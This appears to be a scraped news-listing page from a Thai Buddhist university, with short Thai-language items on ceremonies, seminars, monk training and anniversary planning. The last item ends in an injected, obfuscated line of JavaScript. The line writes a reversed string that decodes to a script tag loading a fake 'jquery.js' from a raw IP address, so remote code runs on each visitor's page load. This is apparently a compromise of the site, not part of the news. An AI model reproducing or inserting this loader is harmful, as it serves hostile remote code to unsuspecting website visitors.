พิธีมอบประกาศนียบัตร หลักสูตรประกาศนียบัตร(ป.บส) , (ป.ทส)

พิธีมอบประกาศนียบัตร หลักสูตรประกาศนียบัตรการบริหารกิจการคณะสงฆ์ (ป.บส) และหลักสูตรประกาศนียบัตร วิชาการเทศนา (ป.ทส) ในวันที่ ๒๗ กุมภาพันธ์ ๒๕๕๘ ภาคเช้า เวลา ๐๙.๐๐ น. มีพระราชวรเมธี รองอธิการบดีฝ่ายบริหาร เป็นประธานในพิธีเปิด พร้อมให้โอวาท และมี พระครูปริยัติกิตติธำรง,ผศ.,ดร. คณบดีคณะสังคมศาสตร์ กล่าวถวายรายงาน จากนั้นเวลา ๑๐.๐๐ น. มีการอภิปรายเรื่อง "ศีลห้ากับการคืนความสุขให้กับสังคมไทย" ซึ่งมีตัวแทนผู้สำเร็จการศึกษาเข้าร่วมอภิปรายดำเนินรายการโดย...

MCU oganized Songkran Festival bathing the Holy Buddha images around Thaiมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จัดงานประเพณีสงกรานต์ สรงน้ำพระพุทธรูปศักดิ์สิทธิ์ทั่วไทย

มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จัดงานประเพณีสงกรานต์ สรงน้ำพระพุทธรูปศักดิ์สิทธิ์จำลอง ทั่วประเทศไทย จำนวน ๙ องค์ ได้แก่ ๑. พระแก้วมรกต กรุงเทพมหานคร ๒. พระพุทธชินราช พิษณุโลก ๓. พระพุทธสิหิงค์ กรุงเทพ - เชียงใหม่ - นครศรีธรรมราช ๔. พระมงคลบพิตร พระนครศรีอยุธยา ๕. พระพุทธโสธร ฉะเชิงเทรา ๖. พระพุทธไตรรัตนนายก พระนครศรีอยุธยา ๗. หลวงพ่อวัดบ้านแหลม สมุทรสงคราม ๘....

Phra Dhammaduta Class 21 worship to Phra Phrom Vajrayanaพระธรรมทูตรุ่นที่ ๒๑ ถวายสักการะหลวงพ่อพระพรหมวชิรญาณ

โครงการอบรมพระธรรมทูตสายต่างประเทศรุ่นที่ ๒๑ นำโดย พระโสภณวชิราภรณ์ รองอธิการบดีฝ่ายกิจการต่างประเทศ และผู้อำนวยการวิทยาลัยพระธรรมทูต มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย เข้าถวายสักการะพระพรหมวชิรญาณ กรรมการมหาเถรสมาคม เจ้าอาวาสวัดยานนาวา และอดีตประธานสมัชชาสงฆ์ไทยในสหรัฐอเมริกา ๑๐ สมัย ในโอกาสอายุวัฒนมงคล ๗๘ ปี ในการนี้พระเดชพระคุณฯ ได้เมตตากล่าวธัมโมวาท การปฏิบัติศาสนกิจในต่างประเทศ เป็นวิชาประสบการณ์ตรง ต้องใช้ขันติ เมตตา ปัญญา ทมะ จาคะ ใช้ความรู้ให้เป็นความสามารถ อย่าเก่งแต่วิชาการ...

สัมมนานิสิตปฏิบัติศาสนกิจ ๔ ภาค รุ่นที่ ๖๐

สัมมนานิสิตปฏิบัติศาสนกิจ ๔ ภาค รุ่นที่ ๖๐ ประจำภาคกลาง และภาคใต้                 ในวันที่ ๑๑ มีนาคม ๒๕๕๘ เวลา ๑๓.๓๐ น. พระเดชพระคุณพระพรหมบัณฑิต,ศ.ดร. อธิการบดี มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย เป็นประธานในพิธีเปิดการสัมมนานิสิตปฏิบัติศาสนกิจ ๔ ภาค รุ่นที่ ๖๐ ประจำภาคกลางและภาคใต้ (ส่วนกลาง-วข.นครศรีธรรมราช-บาฬีศึกษาพุทธโฆส, วส.นครสวรรค์-ปัตตานี-พุทธโสธร, หร.สิงห์บุรี-สุราษฎร์ธานี-กาญจนบุรี, นวบ.สงขลา-ราชบุรี-เพชรบุรี-อุทัยธานี-ชลบุรี-ระยอง-นครปฐม-พิจิตร-จันทบุรี-สุพรรณบุรี)...

โลโก้ มจร 130 ปี เนื่องในวาระวันครบรอบสถาปนา 130 ปี มหาจุฬาฯ มหาวิทยาลัย

"๑๓๐ ปี มหาจุฬา" เนื่องในวาระวันครบรอบสถาปนา 130 ปี มหาจุฬาฯ มหาวิทยาลัยได้มีการประชุมเตรียมงานในวันพุธที่ ๒๓ สิงหาคม พ.ศ. ๒๕๖๐ เวลา ๑๔.๐๐ น. พระพรหมบัณฑิต,ศ.ดร.อธิการบดี มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย เป็นประธานในการประชุมคณะกรรมการจัดงาน ครบรอบวันสถาปนา "๑๓๐"ปี มหาจุฬา" ณ ห้องประชุม ๔๐๑ อาคารสำนักงานอธิการบดี ซึ่งงานสำคัญในครั้งนี้ จะจัดขึ้นระหว่างวันที่ ๑๓-๑๗ กันยายน...

พิธีปฐมนิเทศและสัมมนา ป.บัณฑิตพิธีปฐมนิเทศและสัมมนา ป.บัณฑิต

<img data-id="581" src="http://pr.mcu.ac.th/wp-content/uploads/2015/04/IMG_8592-2-300x200.jpg" alt="IMG_8592 (2)" width="300" height="200" class="alignnone size-medium wp-image-581" />พิธีปฐมนิเทศและสัมมนา พระครูสังฆรักษ์ กิตติพงษ์ สิริวฑฺฒโน รองคณบดีฝ่ายวิชาการ คณะครุศาสตร์ และผู้อำนวยการโครงการหลักสูตรประกาศนียบัตรบัณฑิตวิชาชีพครู เป็นประธานในพิธีเปิด พร้อมกล่าวให้โอวาทแก่นิสิต จากนั้นสัมมนาในหัวข้อ "เส้นทางสู่ความเป็นครูวิชาชีพ" โดย ดร.พรศรี ฉิมแก้ว ผู้อำนวยการสำนักมาตรฐานวิชาชีพ สำนักงานเลขาธิการคุรุสภา...

Peace Study seminar in “Peace in visions of religions”สันติศึกษาอภิปรายเรื่องสันติภาพในมุมมองศาสนา

๑๑ กรกฎาคม ๒๕๕๘ ช่วงบ่ายโดยเริ่มประมาณ ๑๓.๐๐ น. มีการอภิปรายเรื่อง "สันติภาพในมุมมองศาสนา" ซึ่งดำเนินรายการโดย พระครูพิพิธสุตาทร,ดร. อาจารย์ประจำวิชาสันติศึกษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ตัวแทนศาสนาคริสต์ นายมงซินญอร์แอนดูรว์ วิษณุธัญญอนันต์ รองเลขาธิการพระสังฆราชคาทอลิกแห่งประเทศไทย กล่าวว่า การเสวนาสร้างสันติที่แท้จริง...

พอ.มจร จัดพิธีมอบประกาศนีบัตร – วุฒิบัตร และทุนการศึกษา ประจำปีการศึกษา ๒๕๕๗

พิธีมอบประกาศนีบัตร - วุฒิบัตร และทุนการศึกษา ประจำปีการศึกษา ๒๕๕๗ พิธีมอบประกาศนีบัตร - วุฒิบัตร และทุนการศึกษา ประจำปีการศึกษา ๒๕๕๗จัดโดยโรงเรียนพุทธศาสนาวันอาทิตย์ มจร โดยมีพระราชวรเมธี,ดร. รองอธิการบดีฝ่ายบริหาร เป็นประธานจุดธูปเทียนบูชาพระรัตยตรัย และเป็นประธานมอบเกียรติบัตร "คนดีศรี พอ." ได้แก่ผู้ที่อุปถัมภ์โรงเรียน จากนั้นกล่าวสัมโมทียกถา และพระสงฆ์ ๙ รูป เจริญชัยมงคลกถา ภาคบ่าย ๑๓.๐๐ น. มีการประกวดกิจกรรมการแข่งขันทุกประเภท...

โครงการอบรมเจ้าหน้าที่ทะเบียน ๔ ภาคโครงการอบรมเจ้าหน้าที่ทะเบียน ๔ ภาค

โครงการอบรมเจ้าหน้าที่ทะเบียน ๔ ภาค โดยสำนักทะเบียนและวัดผล ซึ่งโครงการนี้มีเจ้าหน้าที่ทะเบียนทั้งส่วนกลางและส่วนภูมิภาค จำนวนทั้งสิ้น ๑๑๕ รูป/คน การอบรมในครั้งนี้แบ่งออกเป็น ๒ กิจกรรม คือ การอบรมสัมมนาแลกเปลี่ยนเรียนรู้ปัญหาการใช้ระบบทะเบียนร่วมกัน การอบรมเชิงปฏิบัติการด้วยระบบทะเบียนออนไลน์ที่ห้องปฏิบัติการคอมพิวเตอร์ เพื่อให้สอดคล้องกับภาระงาน โดยจัดขึ้นระหว่างวันที่ ๓๑ สิงหาคม - ๑ กันยายน ๒๕๕๘ ภาคเช้าของวันจันทร์ ที่ ๓๑ สิงหาคม ๒๕๕๘ เวลา...

พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิตปฏิบัติธรรม

วันนี้ ๒๕ ธันวาคม ๒๕๕๗ เวลา ๑๓.๐๐ น. พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิต และกล่าวให้โอวาทแก่นิสิตซึ่งปฏิบัติธรรมอยู่ ณ อาคารหอประชุม มวก. ๔๘ พรรษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
X